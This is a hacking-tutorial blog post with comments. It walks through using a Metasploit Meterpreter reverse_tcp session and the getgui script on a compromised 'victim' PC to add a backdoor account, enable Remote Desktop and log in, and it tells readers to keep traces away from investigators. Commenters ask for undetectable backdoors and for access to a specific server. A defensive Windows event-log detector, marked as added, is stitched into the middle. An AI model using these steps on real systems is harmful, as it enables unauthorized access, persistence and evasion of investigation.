5 Steps to Enable Remote Desktop Using Metasploit Meterpreter



Type : Tutorial

Level : Beginner, Medium

Last year, when I was teaching a computer security class, one student came and asked, "Can you give me a simple tutorial on how to use the command prompt?" I said, "I don't think it can be done in a short course, because to learn the command prompt you should practice every day at first and make it as familiar as your mother tongue." From this situation I know that not everyone knows the command prompt or anything console-based. How about hacking? Yep, it's the same… sometimes newcomers just follow tutorials but don't know what exactly they are doing.

Today I will write a simple tutorial on how to enable Remote Desktop (which uses the Remote Desktop Protocol on TCP port 3389) when you are already inside a remote system using the Metasploit Framework. This method should be useful if your command prompt skills are limited. In this case, we will utilize Carlos Perez's 'getgui' script, which enables Remote Desktop and creates a user account for you to log into it with.

Requirements:

1. Metasploit Framework

2. BackTrack 5 (or another Linux OS)

5 Steps to Enable Remote Desktop Using Metasploit Meterpreter :

1. My favourite Meterpreter payload is reverse_tcp. If you also like to use reverse_tcp for your payload, you can set it with the command below.

set payload windows/meterpreter/reverse_tcp

2. Inside the meterpreter, execute

meterpreter > run getgui -h


to view the help.

3. To add a user with username valent and password r4h45i4 and then enable the Remote Desktop service:

run getgui -u valent -p r4h45i4

Yep, we have successfully created the user and activated the Remote Desktop service.

Please note the last command, "For cleanup use command : run multi_console_command….bla…bla….bla"; it will be used after you finish using the Remote Desktop service of the victim computer.

4. To connect to the victim using Remote Desktop, we can use the rdesktop program (it's already installed on BackTrack).

rdesktop -u <username>  -p <password> <ip-address-target>


initializing……and then….


5. You should also remember that adding a user means you are adding one new user on the remote computer. Be wise in using this method, because the more changes you make, the more traces you leave on the remote computer, and they can be tracked by investigators 🙂. To clean up the user we created earlier (you can see it in step 3).
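The traces mentioned in step 5 are what a defender looks for. The following is an added example, not part of the original post: it correlates Windows Security events for an account that is created (event 4720), added to a sensitive local group (4732) and then used for a Remote Desktop logon (4624, logon type 10) within a short window. The field names, the one-hour window and the sample events are constructed for illustration and assume the events have already been exported and normalised to these fields.

```python
from datetime import datetime, timedelta

# Constructed sample events (not real logs), reduced to the fields used here.
# 4720 = user account created, 4732 = member added to a local group,
# 4624 with logon_type 10 = RemoteInteractive (Remote Desktop) logon.
SAMPLE_EVENTS = [
    {"time": "2024-01-10T09:00:05", "id": 4720, "target": "valent"},
    {"time": "2024-01-10T09:00:06", "id": 4732, "target": "valent", "group": "Remote Desktop Users"},
    {"time": "2024-01-10T09:00:06", "id": 4732, "target": "valent", "group": "Administrators"},
    {"time": "2024-01-10T09:03:40", "id": 4624, "target": "valent", "logon_type": 10, "source_ip": "192.0.2.15"},
    {"time": "2024-01-10T11:20:00", "id": 4720, "target": "newhire"},
    {"time": "2024-01-10T11:25:00", "id": 4732, "target": "newhire", "group": "Users"},
    {"time": "2024-01-10T12:00:00", "id": 4624, "target": "alice", "logon_type": 10, "source_ip": "192.0.2.20"},
]

SENSITIVE_GROUPS = {"administrators", "remote desktop users"}


def find_new_account_rdp(events, window=timedelta(hours=1)):
    """Flag accounts created, put in a sensitive group, and used over RDP within `window`."""
    created = {}   # account -> creation time
    groups = {}    # account -> sensitive groups joined inside the window
    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(ev["time"])
        user = ev["target"].lower()
        if ev["id"] == 4720:
            created[user] = when
            groups[user] = set()
            continue
        if user not in created or when - created[user] > window:
            continue  # account is not new, or the activity is outside the window
        if ev["id"] == 4732 and ev["group"].lower() in SENSITIVE_GROUPS:
            groups[user].add(ev["group"])
        elif ev["id"] == 4624 and ev.get("logon_type") == 10 and groups[user]:
            findings.append({
                "account": user,
                "created": created[user].isoformat(),
                "groups": sorted(groups[user]),
                "rdp_from": ev["source_ip"],
                "minutes_after_creation": round((when - created[user]).total_seconds() / 60, 1),
            })
    return findings


if __name__ == "__main__":
    for finding in find_new_account_rdp(SAMPLE_EVENTS):
        print(finding)
```

Only the first constructed account is flagged; the account added to Users and the existing account logging on over RDP are not.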



Hope it's useful for you… Any questions? Just drop them in the comment box. 🙂


Blogger at hacking-tutorial.com. Love PHP, offensive security and web.
Contact him at me[-at-]vishnuvalentino.com


  • Hagai

    I have a beginner's Q. 🙂
    Where do I find the Meterpreter in BT5?

  • puppet

    How do we know the username and password of the victim???
    And do we need to add a new user to the victim computer?

    • v4L

      First of all, you should find a vulnerable target…and then try to compromise it…when you successfully compromise the target, you don’t need to input any password or username 🙂

  • mehdi

    I have a problem: Unknown command: rdesktop

    • v4L

      Hmm….maybe you didn’t have rdesktop installed…try to run apt-get install rdesktop.


  • th3bAdh

    I have a problem with rdesktop: password was invalid, but I've double-checked the password and am still getting the error

    • v4L

      hmm…if the password was correct it should have no error like this…maybe the password was empty or issue with keyboard localization..

  • vir0e5

    Thx for info….
    Download RDesktop

  • josh

    I am using following payload:
    but when I run the exploit..
    after the binding, it says "Sending exploit …"
    and then it returns me ….msf  exploit(ms03_026_dcom) > 
    so nothing happens…..you know what could be the possible reason for this?

    • v4L

      maybe it means that the target isn’t vulnerable.

  • bagus

    When I write getgui – h run, run the command it says unknown ..
    What should I do ?

    • v4L

      Are you already inside the meterpreter console?

  • DeusIgni

    Whenever I attempt to create a shell in target computer, the handler is created on my end, but the connection times out. Why is that? Is it error on my end?

    • v4L

      Hmm, maybe the target prevents you from creating it…it doesn’t mean that if you got meterpreter, you’ll also get the shell…it depends on the vulnerability ranking…fyi the target machine in this tutorial was XP SP0..

  • DeusIgni

    Is there a way to use this exploit on XP SP3?

  • boby

    I am using BT5 R2 in VMware. I am trying to remotely control my Win 7 desktop. When meterpreter session -i 1 is started like
    when I enter the shell, pwd or cd command it gives me an error of unknown command
    What will I do??

    • v4L

      maybe the rating of the exploit you use is not an excellent one. btw if you want to try and make sure it works you can view this tutorial http://www./hacking-tutorial/create-simple-exploit-using-metasploit-to-hack-windows-7/

  • boby

    I'm using windows/meterpreter/reverse_tcp, I have the same problem. I have tried java_signed_applet, I still have this problem " unknown command ". When I was using BackTrack 5 R1 it was working very well.
    Is there any installation problem, or may there be some bugs in BackTrack 5 R2???

  • boby

    pwd unknown command
    same problem

    • v4L

      Hmmm….maybe you can try to update your metasploit framework first by using msfupdate command.

      • boby

        Thank you very much for your reply… 🙂

        Which tool of BackTrack 5 must be updated after installation?? And which command do I have to use???

        i am using these commands
        for msf
        for library
        2,apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils

        which command you have suggested me to update backtrack 5 R1 or Backtrack 5 R2 for better performance?

        • v4L

          btw I didn’t know the exact thing from your problem and how you install your BT. maybe you also can try to update your system using apt-get update and apt-get upgrade.

  • boby

    My problem is solved. Thanks for your help

  • deff

    what is stupidity, provide a metasploit payload when you just need to add user to a group and start a service from shell. I understand the reason you provide it but would be a lot more useful to actually explain it than just provide script kiddies…

    • v4L

      LoL…maybe what you mean is http://www./tips-and-trick/how-to-enable-remote-desktop-using-command-prompt/
      if you think like that, so why didn’t you contribute by writing an “awesome tutorial” here? or maybe you give your own tutorial link…don’t just say and criticize without action 😛 it’s just wasting your time… 🙂
      ps : next time it’s better to use your real e-mail, not the fake one 🙂
      merci monsieur

  • Puka

    I have metasploit 4.4 gui comunity edition but no change to exploit. btw i have windows 7 sp1

    • v4L

      I don’t understand?

  • anonymous

    I have installed BackTrack on VMware and hacked my Windows 7 system with the system internal IP, but how can I set my dynamic IP to hack a computer remotely

    • v4L

      read more here : http://www./hacking-tutorial/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/

  • Samuel

    Hi, when i tried to do the rdesktop -u ( ) -p ( ) and the ipaddress and pressed enter it says Autoselected keyboard map en-us and does not do anything…do you know why that happens?

    • v4L

      hmm…maybe the remote desktop service on the victim PC hasn’t started yet..
      maybe you can take a look at this tutorial : http://www./tips-and-trick/how-to-enable-remote-desktop-using-command-prompt/

  • Thirteen

    Thanks for your time and effort to provide tutorials!

  • boby


    Please give me a tutorial to hack a PC on another network. Please guide me

    • v4L


  • Remaro

    Like other people, I am also getting the “unknown command” error once the meterpreter prompt is up, and no commands will work. You can see it here: http://imgur.com/WK2KQ What causes this?

  • after executing this command :
    run getgui -u testuser -p testpass

    show me this message :
    This version of Meterpreter is not supported with this Script!

    what’s the problem?

    • v4L

      maybe you can try to update the metasploit library msfupdate.

  • boby


    I want to download vanish.sh and crypter.ph for BackTrack 5 R3. I searched for it on Google but I cannot find it. Kindly give me these undetectable backdoors or a download link. I will be very thankful to you

    • v4L

      I think you just haven’t searched for it 🙂

      • boby

        No, it's not 😀 I searched on the net, I found the code but it didn’t work 🙂
        Thanks for your cooperation 🙂

  • fahmi

    After I type set payload windows/meterpreter/reverse_tcp the meterpreter won’t show up, why? Thanks

    • v4L


      you need to exploit 1st and can get the meterpreter console. See other hacking tutorials here http://www./category/hacking-tutorial/

  • intoxicate

    Hey, I’ve tried to use getgui through meterpreter but apparently it doesn’t add user to the remote machine. To prove this, I get on my remote host and run net command to see if any user has been added to administrator local group. But none of user has been added to that group. Since it doesn’t add a user to remote host, I cannot login via rdesktop. I’m not sure if the script is not working properly or I did something wrong.

    • v4L


      on victim computer, you need to have system privileges

  • sheaz


    v4L i want to hack a server its ip is 203.128.26.xxx and remote desktop is already on. i am new in this field. please only make user in this server and please give me user name and password i am very thankful to you.

  • akbar

    I am a student from Iran ..
    thanks for your this tutorial ….!

  • GuestMan

    Does it work when the victim has Linux?

    • v4L

      no it cannot

  • Guest1

    rdesktop is not pre-installed in BT 5 or Kali Linux

  • tom

    java blocks the applet completely, is there any way to get around this an updated method of doing the same or a similar thing